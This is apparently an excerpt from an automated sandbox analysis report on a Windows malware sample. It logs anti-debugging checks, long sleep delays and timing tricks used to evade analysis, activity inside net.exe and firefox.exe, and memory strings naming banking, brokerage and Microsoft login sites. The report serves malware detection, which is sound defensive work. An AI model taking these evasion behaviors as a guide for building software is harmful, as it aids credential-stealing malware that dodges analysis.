                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 2C80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 2A80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 76D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 86D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 8870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: 9870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: A2D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: B2D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory allocated: C2D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_004155F0 rdtsc
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 616
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 9357
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exe | API coverage: 2.7 %
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe TID: 2960 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 1212 | Thread sleep count: 616 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 1212 | Thread sleep time: -1232000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 1212 | Thread sleep count: 9357 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 1212 | Thread sleep time: -18714000s >= -30000s
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668 | Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668 | Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668 | Thread sleep time: -51000s >= -30000s
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668 | Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668 | Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_0281C680 FindFirstFileW, FindNextFileW, FindClose
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Thread delayed: delay time: 922337203685477
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 35859UlfLq.11.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 35859UlfLq.11.dr | Binary or memory string: discord.comVMware20,11696487552f
                Source: 35859UlfLq.11.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 35859UlfLq.11.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 35859UlfLq.11.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: global block list test formVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 35859UlfLq.11.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653096125.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 35859UlfLq.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 35859UlfLq.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 35859UlfLq.11.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 35859UlfLq.11.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 35859UlfLq.11.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 35859UlfLq.11.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 35859UlfLq.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 35859UlfLq.11.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 35859UlfLq.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 35859UlfLq.11.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 35859UlfLq.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 35859UlfLq.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 35859UlfLq.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: firefox.exe, 0000000D.00000002.2937725892.0000017D8445F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_004155F0 rdtsc
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00417783 LdrLoadDll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018FC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01880185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_019061C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_019161E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018701F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018EE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01900115 mov eax, dword ptr fs:[00000030h]4_2_01900115
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov ecx, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01870124 mov eax, dword ptr fs:[00000030h]4_2_01870124
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov ecx, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846154 mov eax, dword ptr fs:[00000030h]4_2_01846154
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846154 mov eax, dword ptr fs:[00000030h]4_2_01846154
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C156 mov eax, dword ptr fs:[00000030h]4_2_0183C156
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D8158 mov eax, dword ptr fs:[00000030h]4_2_018D8158
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914164 mov eax, dword ptr fs:[00000030h]4_2_01914164
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914164 mov eax, dword ptr fs:[00000030h]4_2_01914164
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184208A mov eax, dword ptr fs:[00000030h]4_2_0184208A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018380A0 mov eax, dword ptr fs:[00000030h]4_2_018380A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D80A8 mov eax, dword ptr fs:[00000030h]4_2_018D80A8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019060B8 mov eax, dword ptr fs:[00000030h]4_2_019060B8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019060B8 mov ecx, dword ptr fs:[00000030h]4_2_019060B8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C20DE mov eax, dword ptr fs:[00000030h]4_2_018C20DE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0183A0E3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C60E0 mov eax, dword ptr fs:[00000030h]4_2_018C60E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018480E9 mov eax, dword ptr fs:[00000030h]4_2_018480E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C0F0 mov eax, dword ptr fs:[00000030h]4_2_0183C0F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018820F0 mov ecx, dword ptr fs:[00000030h]4_2_018820F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C4000 mov ecx, dword ptr fs:[00000030h]4_2_018C4000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A020 mov eax, dword ptr fs:[00000030h]4_2_0183A020
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C020 mov eax, dword ptr fs:[00000030h]4_2_0183C020
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6030 mov eax, dword ptr fs:[00000030h]4_2_018D6030
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842050 mov eax, dword ptr fs:[00000030h]4_2_01842050
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6050 mov eax, dword ptr fs:[00000030h]4_2_018C6050
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186C073 mov eax, dword ptr fs:[00000030h]4_2_0186C073
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186438F mov eax, dword ptr fs:[00000030h]4_2_0186438F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186438F mov eax, dword ptr fs:[00000030h]4_2_0186438F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FC3CD mov eax, dword ptr fs:[00000030h]4_2_018FC3CD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C63C0 mov eax, dword ptr fs:[00000030h]4_2_018C63C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov ecx, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E43D4 mov eax, dword ptr fs:[00000030h]4_2_018E43D4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E43D4 mov eax, dword ptr fs:[00000030h]4_2_018E43D4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018763FF mov eax, dword ptr fs:[00000030h]4_2_018763FF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C310 mov ecx, dword ptr fs:[00000030h]4_2_0183C310
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01860310 mov ecx, dword ptr fs:[00000030h]4_2_01860310
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov ecx, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190A352 mov eax, dword ptr fs:[00000030h]4_2_0190A352
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov ecx, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E8350 mov ecx, dword ptr fs:[00000030h]4_2_018E8350
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191634F mov eax, dword ptr fs:[00000030h]4_2_0191634F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E437C mov eax, dword ptr fs:[00000030h]4_2_018E437C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E284 mov eax, dword ptr fs:[00000030h]4_2_0187E284
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E284 mov eax, dword ptr fs:[00000030h]4_2_0187E284
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov ecx, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
